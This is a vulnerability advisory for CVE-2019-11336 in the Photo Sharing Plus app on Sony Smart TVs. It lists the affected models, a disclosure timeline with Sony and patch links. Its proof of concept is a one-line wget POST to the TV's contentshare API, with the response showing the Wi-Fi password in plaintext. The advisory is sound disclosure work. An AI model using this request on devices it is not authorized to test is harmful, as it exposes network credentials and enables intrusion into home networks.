Sony Smart TV Photo Sharing Plus Information Disclosure Vulnerability

23 April 2019

 

CVE

 

CVE-2019-11336

 

XID

 

XL-19-003

 

CVSS SCORE

 

6.5 (AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)

 

AFFECTED VENDORS

 

Sony

 

AFFECTED SYSTEMS 

 

 

 

 

 

 

 

 

 

 

 

 

Sony Smart TVs (non-exhausted list):

KDL-50W800C, KDL-50W805C, KDL-50W807C, KDL-50W809C, KDL-50W820C, KDL-55W800C, KDL-55W805C, KDL-65W850C, KDL-65W855C, KDL-65W857C, KDL-75W850C, KDL-75W855C, XBR-43X830C, XBR-49X800C, XBR-49X830C, XBR-49X835C, XBR-49X837C, XBR-49X839C, XBR-55X805C, XBR-55X807C, XBR-55X809C, XBR-55X810C, XBR-55X850C, XBR-55X855C, XBR-55X857C, XBR-65X800C, XBR-65X805C, XBR-65X807C, XBR-65X809C, XBR-65X810C, XBR-65X850C, XBR-65X855C, XBR-65X857C, XBR-75X850C, XBR-75X855C, XBR-55X900C, XBR-55X905C, XBR-55X907C, XBR-65X900C, XBR-65X905C, XBR-65X907C, XBR-65X930C, XBR-75X910C, XBR-75X940C, XBR-75X945C, XBR-43X800D, XBR-49X800D, XBR-49X835D, XBR-55X850D, XBR-55X855D, XBR-55X857D, XBR-65X850D, XBR-65X855D, XBR-65X857D, XBR-75X850D, XBR-75X855D, XBR-75X857D, XBR-85X850D, XBR-85X855D, XBR-85X857D, XBR-55X930D, XBR-65X930D, XBR-65X935D, XBR-65X937D, XBR-75X940D, XBR-100Z9D, XBR-49X700D, XBR-55X700D, XBR-65X750D, XBR-65Z9D, XBR-75Z9D, XBR-43X800E, XBR-49X800E, XBR-49X900E, XBR-55A1E, XBR-55X800E, XBR-55X806E, XBR-55X900E, XBR-55X930E, XBR-65A1E, XBR-65X850E, XBR-65X900E, XBR-65X930E, XBR-75X850E, XBR-75X900E, XBR-75X940E, XBR-77A1E

 

VULNERABILITY SUMMARY    

 

 

 

 

 

The “Photo Sharing Plus” application running inside the Smart TV functionality is to upload photos from a smartphone to the TV, in order to display on the television screen. When the application is launched, it allows the TV to be a Wi-Fi access point and displays the Wi-Fi password allowing to authenticate and share media content on the Sony Smart TV.

The vulnerability allows an attacker - without authentication from the LAN/Wi-Fi - to retrieve the static Wi-Fi password created by the television when the Photo Sharing Plus application is started.

 

TECHNICAL DETAILS

 

An unauthenticated remote attacker can retrieve the plaintext wireless password through the “Photo Sharing Plus” API.

 

PROOF OF CONCEPT 

 

After starting the application, the following example retrieves the wireless password created from the TV (IP of the TV is 192.168.1.102) over the LAN, without authentication:

 

 

 

root@kali:~# wget -qO- --post-data='{"id":80,"method":"getContentShareServerInfo" ,"params":[],"version":"1.0"}' http://[ip_tv]:10000/contentshare/

 

{"result":[{"ssid":"DIRECT-GD-BRAVIA","keyType":"","key":"8362tbwX","deviceName":"","url":"http:\/\/192.168.49.1" ,"touchPadRemote":"notSupported"}],"id":80}

 

 

The password is 8362tbwX.

By reading logs in the TV, we can confirm the password has been delivered over HTTP, without authentication:

 

 

01-01 07:47:23.730 5539 18687 I System.out: [MEXI][D] HttpEndPoint: send: {"result":[{"ssid":"DIRECT-GD-BRAVIA","keyType":"","key":"8362tbwX","deviceName":"","url":"http:\/\/192.168.49.1" ,"touchPadRemote":"notSupported"}],"id":80}

TIMELINE

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

03/10/2018 – Vulnerability found

10/10/2018 - Report to Sony Bug bounty program through HackerOne

12/10/2018 - Confirmation of the reception of the bug report

15/10/2018 – xen1thLabs explains that the vulnerabilities are also exploitable over HbbTV (DVB-{S,T,C})

29/10/2018 - Sony confirms vulnerability

09/11/2018 - Sony confirms the patches will be available in March 2019 and asks xen1thLabs to wait until April 2019

29/11/2018 – xen1thLabs sent the slides prior to xen1thLabs talk at HiTB Dubai 2018 as agreed with Sony

14/01/2019 - Updates requested from xen1thLabs

15/01/2019 - Sony informs xen1thlabs that they are working on patches

27/01/2019 - Updates requested from xen1thLabs

07/03/2019 - Updates requested from xen1thLabs

15/03/2019 – Sony informs xen1thLabs that the agreed date for disclosure is not possible because they don’t know when they will be ready “maybe in a couple of months”

17/03/2019 – Updates requested from Sony to understand and to publish a security advisory. xen1thLabs also requests a CVE officially

20/03/2019 – xen1thLabs asks for an acceptable timeline

21/03/2019 – xen1thLabs sent an email to Secure@Sony.com due to the lack of proper communication from Sony and informing Sony that in order to protect their customers xen1thLabs needs to publish a security advisory  

21/03/2019 – Automatic response from Secure@Sony.com is no more in use

22/03/2019 – Sony is working on the patches and confirms the 12th April

26/03/2019 – xen1thLabs confirms the release date of the advisory and asks for a CVE

01/04/2019 – Sony confirms the vulnerabilities affects a range of models and “Sony plans to terminate Photo Sharing Plus service for all of models, and that completion date is scheduled for April 12th, 2019.”

16/04/2019 - Sony does not provide a CVE. Sony states "the wireless password recovery is within Sony's TV specification and is expected behavior and Sony will not be submitting for a CVE regarding this"

17/04/2019 - xen1thLabs requests a CVE from MITRE

23/04/2019 - Public disclosure

 

SOLUTION

 

 

 

 

 

 

 

 

 

Apply patches provided by Sony

Firmware update to v6.5830 from 01-22-2019 (including security patches?)

https://www.sony.com/electronics/support/downloads/00015771

 

Firmware update to v6.5830 from 01-22-2019 (not including security patches)

https://www.sony.com/electronics/support/downloads/00015770

 

End of Photo Sharing Plus 11/22/2018

https://www.sony.com/electronics/support/articles/00204331

 

CREDIT

 

xen1thLabs - Telecom Lab